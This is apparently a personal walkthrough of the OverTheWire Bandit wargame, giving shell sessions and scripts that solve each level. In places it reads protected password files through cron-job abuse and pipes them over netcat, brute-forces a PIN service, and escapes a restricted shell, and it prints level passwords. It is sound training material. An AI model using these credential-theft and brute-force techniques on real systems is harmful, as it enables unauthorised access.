Thanks so much to the team at OverTheWire for putting all of this together, and hosting it for free. I hope these solutions may be helpful to you, the reader.
I’ve come to find that there are lots of solutions out there. If mine are not satisfactory, you might also want to check out oneofthese.
The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions
We can use tr to rotate all characters 13 positions back.
The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000.
bandit16@bandit:~$ nmap -p 31000-32000 localhost
Starting Nmap 7.40 ( https://nmap.org ) at 2020-07-06 00:11 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00023s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
31046/tcp open unknown
31518/tcp open unknown
31691/tcp open unknown
31790/tcp open unknown
31960/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
Now, instead of 1000 ports to try, I have five.
Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.
bandit16@bandit:~$ openssl s_client -connect localhost:31046
(did not work)
I bet there’s an automated way of checking these, but there were only five so I didn’t bother researching it. I just tried to connect to each one.
We can look around the home directory with the past user.
There is a .bash_logout function that immediately logs you out if you are trying to log in, if "$SHLVL" = 1.
We could probably do stuff with that, but why bother. We can just cat the file.
Here is what the whole level looks like.
sarge@sargebox >> ~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 -t 'cat readme; bash -login'
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
awhqfNnAbc1naukrpqDYcF95h7HoMTrC
Byebye !
Connection to bandit.labs.overthewire.org closed.
To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
as far as I can tell, I just want to cat /etc/bandit_pass/bandit20
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
We find that /etc/cron.d/cronjob_bandit23 is running /usr/bin/cronjob_bandit23.sh
This is that script, with my comments
#!/bin/bashmyname=$(whoami)# Type:# myname="bandit23"mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)# if name is not set properly, this returns# 7db97df393f40ad1691b6e1fb03d53eb# If name is set properly, it should return:# 8ca319486bfbbc3663ea0fbe81326349echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"# Returns: Copying passwordfile /etc/bandit_pass/bandit23 to /tmp/8ca319486bfbbc3663ea0fbe81326349cat /etc/bandit_pass/$myname > /tmp/$mytarget# cat /tmp/8ca319486bfbbc3663ea0fbe81326349## Returns: QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
/etc/cron.d/cronjob_bandit24 is running /usr/bin/cronjob_bandit24.sh, which is pasted below.
#!/bin/bashmyname=$(whoami)# myname = bandit24cd /var/spool/$myname# Note: In this dir, we have write permissions, but no read permissions.echo "Executing and deleting all scripts in /var/spool/$myname:"for i in * .*;do if [ "$i" != "." -a "$i" != ".." ]; then echo "Handling $i" owner="$(stat --format "%U" ./$i)" if [ "${owner}" = "bandit23" ]; then timeout -s 9 60 ./$i fi rm -f ./$i fidone
i created a temporary directory in /tmp/zsarge, in which i included the following script (named script.sh):
(you could also use mktemp -d if you want. You have permission to make any directory in /tmp)
#!/bin/bash# This is the command to run:# path=/tmp/zsarge/script.sh;path2=/var/spool/bandit24/zsarge.sh; cat $path > $path2; chmod +x $path2; watch "file $path2 && cat $path2"# printf "$(cat /tmp/zsarge/pass)$(date)\n-" > /tmp/zsarge/pass# echo -n 'Line of text'echo -n "$(cat /etc/bandit_pass/bandit24)" | nc localhost 8899
and on a separate terminal instance, i started nc -lvvp 8899
Basically, I am running a shell script that reads the flag and passes it to a separate netcat connection, because writing permissions were getting weird.
I ran this all with:
path=/tmp/zsarge/script.sh;path2=/var/spool/bandit24/zsarge.sh;cat $path > $path2;chmod +x $path2;watch "file $path2 && cat $path2" # you can tell when the file has been run when this disappears
As of 2023, this solution has changed slightly:
The key solution here is to get a bash script to echo the password into something that is readable from another perspective. I imagine you could use a file readable by all users, but I’ll use a network connection, because I know it’ll work.
Open one shell as bandit23, and run:
bandit23@bandit:~$ nc -lvvp 8899Listening on 0.0.0.0 8899
Open another shell as bandit23, and run:
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/nullbandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh#!/bin/bashmyname=$(whoami)cd /var/spool/$myname/foo || exit 1echo "Executing and deleting all scripts in /var/spool/$myname/foo:"for i in * .*;do if [ "$i" != "." -a "$i" != ".." ]; then echo "Handling $i" owner="$(stat --format "%U" ./$i)" if [ "${owner}" = "bandit23" ]; then timeout -s 9 60 ./$i fi rm -rf ./$i fidonebandit23@bandit:~$ cd /var/spool/bandit24bandit23@bandit:/var/spool/bandit24$ # you'd probably want to use `mktemp -d` if you were experimenting for realbandit23@bandit:/var/spool/bandit24$ cat << 'EOF' > /tmp/solve23/solve23.sh#!/bin/bashecho -n "$(cat /etc/bandit_pass/bandit24)" | nc localhost 8899EOFbandit23@bandit:/var/spool/bandit24$ chmod +x /tmp/solve23/solve23.shbandit23@bandit:/var/spool/bandit24$ cp /tmp/solve23/solve23.sh foo
Then, after the minute turns, you should see your other terminal update with:
bandit23@bandit:~$ nc -lvvp 8899Listening on 0.0.0.0 8899Connection received on localhost 37922VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
Well, that seems relatively straightforward.
bandit24@bandit:~$ cd $(mktemp -d)bandit24@bandit:/tmp/tmp.92incHlbeQ$ cat solve24.py
I kinda wish that Ruby was installed, but I’ll do my solution in Python:
# solve24.pypass_24 = "VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar"with open('input.txt', 'w') as f: for i in reversed(range(10000)): f.write(pass_24) f.write(' ') f.write(str(i).zfill(4)) f.write('\n')
bandit24@bandit:/tmp/tmp.92incHlbeQ$ python3 solve24.pybandit24@bandit:/tmp/tmp.92incHlbeQ$ head input.txtVAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9999VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9998VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9997VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9996VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9995VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9994VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9993VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9992VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9991VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar 9990bandit24@bandit:/tmp/tmp.92incHlbeQ$ cat script.shcat input.txt | nc localhost 30002 | grep -v Wrong | tee -a output.txtbandit24@bandit:/tmp/tmp.92incHlbeQ$ time bash script.shI am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.Correct!The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8dExiting.real 0m1.284suser 0m0.010ssys 0m0.000s
Going in reverse saves a significant amount of time.
Just fyi, afterwards, I found another solution that used bash instead of Python.
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
Hmm, interesting. Here, we are just given one file:
bandit25@bandit:~$ lsbandit26.sshkey
We can copy it onto our local machine:
$ # copy bandit26.sshkey to current directory "."$ scp -P 2220 bandit25@bandit.labs.overthewire.org:bandit26.sshkey .
But, on super small screens, more allows to scroll through each line individually (and also enter shell commands), so you’re going to need to either scrunch up your terminal super , so it’s only one or two lines tall.
Remember not to exit this shell. You’ll want it for later.
You can also enter:
:shell
to enter bash.
Level 26
ssh bandit26@bandit.labs.overthewire.org -p 2220 -i bandit26.sshkey(see steps above; TL;DR: Make screen small, use more -> vim -> shell)
Let’s investigate bandit26:
bandit26@bandit:~$ lsbandit27-do text.txtbandit26@bandit:~$ ./bandit27-doRun a command as another user. Example: ./bandit27-do idbandit26@bandit:~$ # ^ this seems like a lie. It really runs the command provided. You don't have to give it an id.bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo via the port 2220. The password for the user bandit27-git is the same as for the user bandit27.
Clone the repository and find the password for the next level.
Ok, seems relatively straightforward:
bandit27@bandit:~$ cd $(mktemp -d)bandit27@bandit:/tmp/tmp.Fjjdw0yRZM$ git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repoCloning into 'repo'...The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesCould not create directory '/home/bandit27/.ssh' (Permission denied).Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts). _ _ _ _ | |__ __ _ _ __ __| (_) |_ | '_ \ / _` | '_ \ / _` | | __| | |_) | (_| | | | | (_| | | |_ |_.__/ \__,_|_| |_|\__,_|_|\__| This is an OverTheWire game server. More information on http://www.overthewire.org/wargamesbandit27-git@localhost's password:remote: Enumerating objects: 3, done.remote: Counting objects: 100% (3/3), done.remote: Compressing objects: 100% (2/2), done.remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0Receiving objects: 100% (3/3), done.bandit27@bandit:/tmp/tmp.Fjjdw0yRZM$ lsrepobandit27@bandit:/tmp/tmp.Fjjdw0yRZM$ cd repobandit27@bandit:/tmp/tmp.Fjjdw0yRZM/repo$ lsREADMEbandit27@bandit:/tmp/tmp.Fjjdw0yRZM/repo$ cat READMEThe password to the next level is: AVanL161y9rsbcJIsFHuw35rjaOM19nR
bandit28@bandit:~$ cd $(mktemp -d)bandit28@bandit:/tmp/tmp.IwzWlrgiqT$ git clone ssh://bandit28-git@localhost:2220/home/bandit28-git/repoCloning into 'repo'...The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesCould not create directory '/home/bandit28/.ssh' (Permission denied).Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts). _ _ _ _ | |__ __ _ _ __ __| (_) |_ | '_ \ / _` | '_ \ / _` | | __| | |_) | (_| | | | | (_| | | |_ |_.__/ \__,_|_| |_|\__,_|_|\__| This is an OverTheWire game server. More information on http://www.overthewire.org/wargamesbandit28-git@localhost's password:remote: Enumerating objects: 9, done.remote: Counting objects: 100% (9/9), done.remote: Compressing objects: 100% (6/6), done.remote: Total 9 (delta 2), reused 0 (delta 0), pack-reused 0Receiving objects: 100% (9/9), done.Resolving deltas: 100% (2/2), done.bandit28@bandit:/tmp/tmp.IwzWlrgiqT$ lsrepobandit28@bandit:/tmp/tmp.IwzWlrgiqT$ cd repobandit28@bandit:/tmp/tmp.IwzWlrgiqT/repo$ lsREADME.mdbandit28@bandit:/tmp/tmp.IwzWlrgiqT/repo$ cat README.md# Bandit NotesSome notes for level29 of bandit.## credentials- username: bandit29- password: xxxxxxxxxxbandit28@bandit:/tmp/tmp.IwzWlrgiqT/repo$ git log --oneline899ba88 (HEAD -> master, origin/master, origin/HEAD) fix info leakabcff75 add missing datac0a8c3c initial commit of README.mdbandit28@bandit:/tmp/tmp.IwzWlrgiqT/repo$ git checkout abcff75Note: switching to 'abcff75'.You are in 'detached HEAD' state. You can look around, make experimentalchanges and commit them, and you can discard any commits you make in thisstate without impacting any branches by switching back to a branch.If you want to create a new branch to retain commits you create, you maydo so (now or later) by using -c with the switch command. Example: git switch -c <new-branch-name>Or undo this operation with: git switch -Turn off this advice by setting config variable advice.detachedHead to falseHEAD is now at abcff75 add missing databandit28@bandit:/tmp/tmp.IwzWlrgiqT/repo$ cat README.md# Bandit NotesSome notes for level29 of bandit.## credentials- username: bandit29- password: tQKvmcwNYcFS6vmPHIUSI3ShmsrQZK8S
There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo via the port 2220. The password for the user bandit29-git is the same as for the user bandit29.
Clone the repository and find the password for the next level.
bandit29@bandit:~$ cd $(mktemp -d)bandit29@bandit:/tmp/tmp.yprHIM2rh2$ git clone ssh://bandit29-git@localhost:2220/home/bandit29-git/repoCloning into 'repo'...The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesCould not create directory '/home/bandit29/.ssh' (Permission denied).Failed to add the host to the list of known hosts (/home/bandit29/.ssh/known_hosts). _ _ _ _ | |__ __ _ _ __ __| (_) |_ | '_ \ / _` | '_ \ / _` | | __| | |_) | (_| | | | | (_| | | |_ |_.__/ \__,_|_| |_|\__,_|_|\__| This is an OverTheWire game server. More information on http://www.overthewire.org/wargamesbandit29-git@localhost's password:remote: Enumerating objects: 16, done.remote: Counting objects: 100% (16/16), done.remote: Compressing objects: 100% (11/11), done.remote: Total 16 (delta 2), reused 0 (delta 0), pack-reused 0Receiving objects: 100% (16/16), done.Resolving deltas: 100% (2/2), done.bandit29@bandit:/tmp/tmp.yprHIM2rh2$ lsrepobandit29@bandit:/tmp/tmp.yprHIM2rh2$ cd repobandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ lsREADME.mdbandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ cat README.md# Bandit NotesSome notes for bandit30 of bandit.## credentials- username: bandit30- password: <no passwords in production!>bandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ git log --oneline4bd5389 (HEAD -> master, origin/master, origin/HEAD) fix username1a57cf1 initial commit of README.mdbandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ git branch -v* master 4bd5389 fix usernamebandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ git branch -r origin/HEAD -> origin/master origin/dev origin/master origin/sploits-devbandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ git switch devBranch 'dev' set up to track remote branch 'dev' from 'origin'.Switched to a new branch 'dev'bandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ git statusOn branch devYour branch is up to date with 'origin/dev'.nothing to commit, working tree cleanbandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ git log --oneline13e7356 (HEAD -> dev, origin/dev) add data needed for development8caf551 add gif2ascii4bd5389 (origin/master, origin/HEAD, master) fix username1a57cf1 initial commit of README.mdbandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ lscode README.mdbandit29@bandit:/tmp/tmp.yprHIM2rh2/repo$ cat README.md# Bandit NotesSome notes for bandit30 of bandit.## credentials- username: bandit30- password: xbhV3HpNGlTIdnjUrdAlPzc2L6y9EOnS
There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo via the port 2220. The password for the user bandit30-git is the same as for the user bandit30.
Clone the repository and find the password for the next level.
bandit30@bandit:~$ cd $(mktemp -d)bandit30@bandit:/tmp/tmp.8b3MUeH5cK$ git clone ssh://bandit30-git@localhost:2220/home/bandit30-git/repoCloning into 'repo'...The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesCould not create directory '/home/bandit30/.ssh' (Permission denied).Failed to add the host to the list of known hosts (/home/bandit30/.ssh/known_hosts). _ _ _ _ | |__ __ _ _ __ __| (_) |_ | '_ \ / _` | '_ \ / _` | | __| | |_) | (_| | | | | (_| | | |_ |_.__/ \__,_|_| |_|\__,_|_|\__| This is an OverTheWire game server. More information on http://www.overthewire.org/wargamesbandit30-git@localhost's password:remote: Enumerating objects: 4, done.remote: Counting objects: 100% (4/4), done.remote: Total 4 (delta 0), reused 0 (delta 0), pack-reused 0Receiving objects: 100% (4/4), 298 bytes | 298.00 KiB/s, done.bandit30@bandit:/tmp/tmp.8b3MUeH5cK$ cd repobandit30@bandit:/tmp/tmp.8b3MUeH5cK/repo$ cat RERAcat: RERA: No such file or directorybandit30@bandit:/tmp/tmp.8b3MUeH5cK/repo$ cat README.mdjust an epmty file... muahahabandit30@bandit:/tmp/tmp.8b3MUeH5cK/repo$ git statusOn branch masterYour branch is up to date with 'origin/master'.nothing to commit, working tree cleanbandit30@bandit:/tmp/tmp.8b3MUeH5cK/repo$ git branch -v* master 59530d3 initial commit of README.mdbandit30@bandit:/tmp/tmp.8b3MUeH5cK/repo$ lsREADME.md# ... lots of random git commands ...bandit30@bandit:/tmp/tmp.8b3MUeH5cK/repo$ git tagsecretbandit30@bandit:/tmp/tmp.8b3MUeH5cK/repo$ git show secretOoffzGDlzhAlerFJ2cAiz1D41JW1Mhmt
There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo via the port 2220. The password for the user bandit31-git is the same as for the user bandit31.
Clone the repository and find the password for the next level.
git gud is not a command 😔
bandit31@bandit:~$ cd $(mktemp -d)
bandit31@bandit:/tmp/tmp.BE1pSk6O9E$ git clone ssh://bandit31-git@localhost:2220/home/bandit31-git/repo
Cloning into 'repo'...
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit31/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (4/4), done.
bandit31@bandit:/tmp/tmp.BE1pSk6O9E$ ls
repo
bandit31@bandit:/tmp/tmp.BE1pSk6O9E$ cd repo
bandit31@bandit:/tmp/tmp.BE1pSk6O9E/repo$ ls
README.md
bandit31@bandit:/tmp/tmp.BE1pSk6O9E/repo$ cat README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/tmp.BE1pSk6O9E/repo$ echo 'May I come in?' > key.txt
bandit31@bandit:/tmp/tmp.BE1pSk6O9E/repo$ git add key.txt -f
bandit31@bandit:/tmp/tmp.BE1pSk6O9E/repo$ git status
On branch master
Your branch is up to date with 'origin/master'.
Changes to be committed:
(use "git restore --staged <file>..." to unstage)
new file: key.txt
bandit31@bandit:/tmp/tmp.BE1pSk6O9E/repo$ git commit -m "solve 31"
[master 9f5f592] solve 31
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/tmp.BE1pSk6O9E/repo$ git push
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit31/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 2 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 321 bytes | 321.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: rmCBvG56y58BXzv98yZGdO7ATVL5dW8y
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost:2220/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://localhost:2220/home/bandit31-git/repo'
bandit33@bandit:~$ ls
README.txt
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!
At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.
If you have an idea for an awesome new level, please let us know!